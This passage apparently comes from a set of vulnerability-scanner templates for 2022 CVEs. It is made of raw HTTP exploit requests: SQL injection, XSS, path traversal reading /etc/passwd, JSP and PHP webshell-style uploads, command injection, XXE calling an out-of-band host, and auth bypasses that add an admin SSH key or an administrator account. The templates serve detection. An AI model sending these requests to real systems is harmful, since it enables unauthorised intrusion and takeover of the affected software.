Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-48197","info":{"name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1'\"()&%<zzz><script>alert(document.domain)</script>","widget.TreeView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0658","info":{"name":"CommonsBooking < 2.6.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, \"partiallyBookedDays\") && contains(body, \"lockDays\")"],"condition":"and"}]}]},{"id":"CVE-2022-44957","info":{"name":"WebTareas 2.4p5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","GET /clients/editclient.php? HTTP/1.1\nHost: {{Hostname}}\n","POST /clients/editclient.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"csrfToken\"\n\n{{csrf}}\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"action\"\n\nadd\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cown\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cn\"\n\n{{randstr}}<details/open/ontoggle=alert(document.domain)>\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"add\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"zip\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ct\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cou\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wp\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"fa\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"url\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"email\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"curr\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wc\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pym\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pyt\"\n\n7\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"c\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ssc\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"file1\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"attnam1\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"atttmp1\"\n\n\n-----------------------------34025600472463336623659912061--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<details/open/ontoggle=alert(document.domain)>","clients/listclients.php?"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp","{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0899","info":{"name":"Header Footer Code Manager < 1.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(/document.domain/)</script>\")","contains(body_2, \"All Snippets\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 